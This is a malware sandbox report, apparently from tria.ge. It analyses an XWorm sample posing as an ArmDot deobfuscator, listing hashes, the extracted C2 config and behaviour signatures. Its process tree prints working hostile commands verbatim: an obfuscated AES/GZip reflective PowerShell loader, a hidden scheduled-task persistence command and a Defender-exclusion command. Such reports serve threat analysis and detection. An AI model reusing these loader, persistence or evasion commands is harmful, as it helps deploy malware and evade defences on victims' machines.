Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
15s -
max time network
15s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09/09/2024, 19:32
Static task
static1
General
-
Target
armdot deobfuscator.exe
-
Size
275KB
-
MD5
2bce10bc9bf1c5e013965c7a60deae05
-
SHA1
7efa1765b1842f4ce9e746c26c7d8394ad7820ce
-
SHA256
5e74f08923fec3a5daf99b9a6c0763b21a98226f90c537235408a4258389ca01
-
SHA512
fbfadeb3f983cc76478864de82952ce34cb7543743a3421151827c5a8226d24ddff2409f71230dfc4bbfad441cea9a148a11a31c16e3890cd5a0797fe4a9e7c0
-
SSDEEP
6144:IwDHUsnM9rwQCz8vRtKT2OyD0Ek+c9NWtO5MxRxLJcNfZ:IAjMnZtgbyD0wyWtOcJeZ
Malware Config
Extracted
xworm
5.0
127.0.0.1:41594
internal-bachelor.gl.at.ply.gg:41594
JgIYtyxyvTKZt7Bf
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3512-86-0x0000000007460000-0x0000000007470000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 3512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2488 powershell.exe 1520 powershell.exe 3512 powershell.exe 2928 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation armdot deobfuscator.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 688 cmd.exe 2744 Armdot Deobf.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3020 2744 WerFault.exe 102 -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language armdot deobfuscator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Armdot Deobf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2488 powershell.exe 2488 powershell.exe 1520 powershell.exe 1520 powershell.exe 3512 powershell.exe 3512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeIncreaseQuotaPrivilege 1520 powershell.exe Token: SeSecurityPrivilege 1520 powershell.exe Token: SeTakeOwnershipPrivilege 1520 powershell.exe Token: SeLoadDriverPrivilege 1520 powershell.exe Token: SeSystemProfilePrivilege 1520 powershell.exe Token: SeSystemtimePrivilege 1520 powershell.exe Token: SeProfSingleProcessPrivilege 1520 powershell.exe Token: SeIncBasePriorityPrivilege 1520 powershell.exe Token: SeCreatePagefilePrivilege 1520 powershell.exe Token: SeBackupPrivilege 1520 powershell.exe Token: SeRestorePrivilege 1520 powershell.exe Token: SeShutdownPrivilege 1520 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeSystemEnvironmentPrivilege 1520 powershell.exe Token: SeRemoteShutdownPrivilege 1520 powershell.exe Token: SeUndockPrivilege 1520 powershell.exe Token: SeManageVolumePrivilege 1520 powershell.exe Token: 33 1520 powershell.exe Token: 34 1520 powershell.exe Token: 35 1520 powershell.exe Token: 36 1520 powershell.exe Token: SeIncreaseQuotaPrivilege 1520 powershell.exe Token: SeSecurityPrivilege 1520 powershell.exe Token: SeTakeOwnershipPrivilege 1520 powershell.exe Token: SeLoadDriverPrivilege 1520 powershell.exe Token: SeSystemProfilePrivilege 1520 powershell.exe Token: SeSystemtimePrivilege 1520 powershell.exe Token: SeProfSingleProcessPrivilege 1520 powershell.exe Token: SeIncBasePriorityPrivilege 1520 powershell.exe Token: SeCreatePagefilePrivilege 1520 powershell.exe Token: SeBackupPrivilege 1520 powershell.exe Token: SeRestorePrivilege 1520 powershell.exe Token: SeShutdownPrivilege 1520 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeSystemEnvironmentPrivilege 1520 powershell.exe Token: SeRemoteShutdownPrivilege 1520 powershell.exe Token: SeUndockPrivilege 1520 powershell.exe Token: SeManageVolumePrivilege 1520 powershell.exe Token: 33 1520 powershell.exe Token: 34 1520 powershell.exe Token: 35 1520 powershell.exe Token: 36 1520 powershell.exe Token: SeIncreaseQuotaPrivilege 1520 powershell.exe Token: SeSecurityPrivilege 1520 powershell.exe Token: SeTakeOwnershipPrivilege 1520 powershell.exe Token: SeLoadDriverPrivilege 1520 powershell.exe Token: SeSystemProfilePrivilege 1520 powershell.exe Token: SeSystemtimePrivilege 1520 powershell.exe Token: SeProfSingleProcessPrivilege 1520 powershell.exe Token: SeIncBasePriorityPrivilege 1520 powershell.exe Token: SeCreatePagefilePrivilege 1520 powershell.exe Token: SeBackupPrivilege 1520 powershell.exe Token: SeRestorePrivilege 1520 powershell.exe Token: SeShutdownPrivilege 1520 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeSystemEnvironmentPrivilege 1520 powershell.exe Token: SeRemoteShutdownPrivilege 1520 powershell.exe Token: SeUndockPrivilege 1520 powershell.exe Token: SeManageVolumePrivilege 1520 powershell.exe Token: 33 1520 powershell.exe Token: 34 1520 powershell.exe Token: 35 1520 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3612 wrote to memory of 2184 3612 armdot deobfuscator.exe 83 PID 3612 wrote to memory of 2184 3612 armdot deobfuscator.exe 83 PID 3612 wrote to memory of 2184 3612 armdot deobfuscator.exe 83 PID 2184 wrote to memory of 2488 2184 cmd.exe 88 PID 2184 wrote to memory of 2488 2184 cmd.exe 88 PID 2184 wrote to memory of 2488 2184 cmd.exe 88 PID 2488 wrote to memory of 1520 2488 powershell.exe 90 PID 2488 wrote to memory of 1520 2488 powershell.exe 90 PID 2488 wrote to memory of 1520 2488 powershell.exe 90 PID 2488 wrote to memory of 3436 2488 powershell.exe 93 PID 2488 wrote to memory of 3436 2488 powershell.exe 93 PID 2488 wrote to memory of 3436 2488 powershell.exe 93 PID 3436 wrote to memory of 3988 3436 WScript.exe 94 PID 3436 wrote to memory of 3988 3436 WScript.exe 94 PID 3436 wrote to memory of 3988 3436 WScript.exe 94 PID 3988 wrote to memory of 3512 3988 cmd.exe 99 PID 3988 wrote to memory of 3512 3988 cmd.exe 99 PID 3988 wrote to memory of 3512 3988 cmd.exe 99 PID 3512 wrote to memory of 688 3512 powershell.exe 101 PID 3512 wrote to memory of 688 3512 powershell.exe 101 PID 3512 wrote to memory of 2744 3512 powershell.exe 102 PID 3512 wrote to memory of 2744 3512 powershell.exe 102 PID 3512 wrote to memory of 2744 3512 powershell.exe 102 PID 3512 wrote to memory of 2928 3512 powershell.exe 108 PID 3512 wrote to memory of 2928 3512 powershell.exe 108 PID 3512 wrote to memory of 2928 3512 powershell.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe"C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\crypt2.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\crypt2.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\crypt2.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_561_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_561.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_561.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_561.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_561.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_561.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\cmd.exe"C:\Users\Admin\AppData\Local\Temp\cmd.exe"7⤵
- Executes dropped EXE
PID:688
-
-
C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe"C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 10488⤵
- Program crash
PID:3020
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2928
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2744 -ip 27441⤵PID:436
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD555d32bc1c206428fe659912b361362de
SHA17056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA25637bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA5122602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
-
Filesize
18KB
MD515847e7f4e4872fc20cf1cd78147d243
SHA1a460b8eb4ce63de7dd0ed89531bbf598dd0401ce
SHA256817c30e75a7263b5e388d654e983647da7015ef45d70cd0a248d1a745be40662
SHA512e5a2344b39e7ef258925140d15efa71d5ae9887b5dec14e9c3d5085f6359f0cd14eb02e3768911a8c7ca5d45f2711da667db7d9f17d825fb0950d7c4d88c8fa6
-
Filesize
22KB
MD5e949a85cefc515f6d281a64a322e575a
SHA105cbb24ee6b77d47ed6b839d446d60c8bc9ffe83
SHA25666ae316114440dc776171193df2af2ce768a3da53b84759ad72209d3ecd73274
SHA512a4a047bbbe8383601db9bfe0b6390559032ba475ce8bb6790720c18b1577c4bd7831f68d69fac6f14721d651d84316d740ef0dc58a2ba34f31870ba9957193f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
316KB
MD5428cec6b0034e0f183eb5bae887be480
SHA17140caf2a73676d1f7cd5e8529db861f4704c939
SHA2563f6aa206177bebb29fc534c587a246e0f395941640f3f266c80743af95a02150
SHA512509b8c138c4928524b4830488a96bd7e4bc7db2c494b10c68e1edcf7d901879126168eaa6635818d29734540f8400e376e5716a3b4dc052cba4e267bbaad7253
-
Filesize
270KB
MD53ea84c5d84c23aa2336ad19120ca2f69
SHA189f8c3ce7dff799df989d77b0589faeacf29577a
SHA256c96331a38563d38ce6ae9f99294c0b39a595275cfdaf1ea85f91f693a7c302e6
SHA5126aa2bf0d81b3fc103333e242492724dbfb45acb7ca5fd3289360bb7cff09d0bd524537570bc353f7ca92fb2e064aacdd3ee7e0a2fa4259b12056301050b8000f
-
Filesize
115B
MD52bbe377fb7d706a939087c8339b0bceb
SHA19242a0b34d9176dfd89d57a590769dc76824b102
SHA256d79183b2822d1237f9cad58962fa434ae7d1caa5e1c55c3fe8d95bbc4f1ffe2e
SHA512dca353a627d3c59f25114fd7387e966e81b941e0649e7f41b8aa21e106bb522b1dde265f00ad76205eb4fc979576461c293140859205762e850e6933aad356da